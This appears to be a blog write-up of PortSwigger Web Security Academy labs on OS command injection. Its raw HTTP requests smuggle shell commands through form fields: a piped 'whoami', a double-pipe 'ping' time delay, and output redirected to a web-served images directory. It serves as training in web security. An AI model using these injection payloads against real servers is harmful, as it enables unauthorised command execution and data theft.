# OS Command Injection
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

Since this topic is also quite easy, I have summarized all of the labs in a nice manner.

## OS Command Injection, Simple Case.
Let's say we have a shop, that has a check stock functionality. It queries to a system that logs the stock of items. 
```html
POST /product/stock HTTP/1.1
Host: target-acc61f991fef371580ae2a7500b6004c.web-security-academy.net
Cookie: session=SPPThDg8x6S6RrINZN3LRXe83vhdPAKM
Content-Length: 28
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://target-acc61f991fef371580ae2a7500b6004c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-acc61f991fef371580ae2a7500b6004c.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

productId=3&storeId=3
```
So it is sending a query with productID and storeID, what if we append a UNIX separator and a UNIX command.
```html
POST /product/stock HTTP/1.1
Host: target-acc61f991fef371580ae2a7500b6004c.web-security-academy.net
Cookie: session=SPPThDg8x6S6RrINZN3LRXe83vhdPAKM
Content-Length: 28
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://target-acc61f991fef371580ae2a7500b6004c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-acc61f991fef371580ae2a7500b6004c.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

productId=3&storeId=3|whoami
```
And we get a 200 response with a username response.

## Blind OS Command Injection with Time Delays
Most of the time we'll be dealing with Blind injection, which means the server doesn't return anything. Let's say we have a submit feedback button that uses a program to send email.
```html
POST /feedback/submit HTTP/1.1
Host: target-ace91fb41f23e151801d7b0800710007.web-security-academy.net
Cookie: session=SkH3FwVQp5D1UXksQawLRTcLXmWxw7Vy
Content-Length: 123
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://target-ace91fb41f23e151801d7b0800710007.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-ace91fb41f23e151801d7b0800710007.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

csrf=n9e8T4bs6Hfx270WsrAOqlZBAXymnEEc&name=faris&email=faris%40gmail.com&subject=test&message=test
```
Let's imagine the program is something like this when executed.
```bash
mail -s "This site is great" -name:'Faris' -aFrom:peter@normal-user.net feedback@vulnerable-website.com
```
So what I did I tried all of the parameters for command injection but something broke when I tried to enter a pipe in the email form, so it is hinting towards an injection. After tries, I managed to form this payload.
```html
POST /feedback/submit HTTP/1.1
Host: target-ace91fb41f23e151801d7b0800710007.web-security-academy.net
Cookie: session=SkH3FwVQp5D1UXksQawLRTcLXmWxw7Vy
Content-Length: 123
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://target-ace91fb41f23e151801d7b0800710007.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-ace91fb41f23e151801d7b0800710007.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

csrf=n9e8T4bs6Hfx270WsrAOqlZBAXymnEEc&name=faris&email=faris%40gmail.com||ping -c 10 127.0.0.1|| &subject=test&message=test
```
1 pipe will break the program so I used 2 , and we can see that the response is delayed by 10 seconds. 

## Blind OS Command Injection with Output Redirection

Again, we're dealing with a lab that uses a mail program, but this time we're using another method. Let's say we want to see the response of our injection, but the server doesn't send a response back. Well we could use output redirection for this. 

Information, we're given is that there is /var/www/images serving images. And if we look at the request in HTTP history.
```html
GET /image?filename=31.jpg HTTP/1.1
Host: target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net
Cookie: session=RhtlYmLPlkK2Bh8HHxjlVaYMdr1n2DFj
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
```
There is a request that fetches filename which indicates directory traversal, so we can read our output.
Let's go to the mail program.
```html
POST /feedback/submit HTTP/1.1
Host: target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net
Cookie: session=RhtlYmLPlkK2Bh8HHxjlVaYMdr1n2DFj
Content-Length: 130
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

csrf=7hBsTy3xLXATwCmjkpXuqC3FtbQGkDSo&name=123&email=123%40gmail.com||whoami>/var/www/images/whoami.txt|| &subject=123&message=123
```
Like the last time, we just have to use 2 pipes, and redirect our output to **/var/www/images/nameoffile.txt**.

And if we check out that file.
```html
GET /image?filename=whoami.txt HTTP/1.1
Host: target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net
Cookie: session=RhtlYmLPlkK2Bh8HHxjlVaYMdr1n2DFj
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://target-acb71f7a1e4bf16c809202d7001b001b.web-security-academy.net/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
We can see the response of our output, this is critical and could lead to a reverse shell.

I won't be doing the last two labs since it requires Burp Collaborator and Portswigger doesn't allow third party requests.


